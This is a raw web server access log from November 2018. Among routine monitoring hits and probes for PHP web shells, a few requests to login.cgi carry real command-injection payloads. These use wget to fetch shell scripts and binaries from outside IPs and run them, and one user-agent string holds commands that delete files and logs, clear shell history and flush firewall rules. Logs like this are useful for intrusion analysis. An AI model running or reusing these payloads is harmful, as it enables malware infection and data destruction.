132.232.51.137 - - [01/Nov/2018:19:53:18 +0100] "POST /phpstudy.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:53:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:54:14 +0100] "POST /weixiao.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:54:16 +0100] "POST /feixiang.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:54:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:54:47 +0100] "POST /ak47.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
94.70.168.71 - - [01/Nov/2018:19:55:03 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://148.72.176.78/ken.sh%20-O%20-%3E%20/tmp/ken.sh;sh%20/tmp/ken.sh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
132.232.51.137 - - [01/Nov/2018:19:55:23 +0100] "POST /ak48.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:55:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:55:45 +0100] "POST /xiao.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:56:08 +0100] "POST /yao.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
212.91.246.72 - - [01/Nov/2018:19:56:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:56:50 +0100] "POST /q.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
122.199.88.132 - - [01/Nov/2018:19:57:11 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.33.165/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2018:19:57:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:57:39 +0100] "POST /pe.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:57:42 +0100] "POST /hm.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:58:07 +0100] "POST /cainiao.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:58:10 +0100] "POST /zuoshou.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
41.34.11.235 - - [01/Nov/2018:19:58:21 +0100] "GET /login.cgi?cli=aa ;wget http://80.211.94.16/Azomip.mips -O /tmp/vv ;sh /tmp/vv ;wget http://80.211.94.16/Azomip.mpsl -O /tmp/cc ;sh /tmp/cc ;wget http://80.211.94.16/Azomip.arm4 -O /tmp/dd ;sh /tmp/dd HTTP/1.1" 404 310 "-" "Azomip/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [01/Nov/2018:19:58:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
132.232.51.137 - - [01/Nov/2018:19:58:31 +0100] "POST /zuo.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
132.232.51.137 - - [01/Nov/2018:19:58:42 +0100] "POST /aotu.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0"
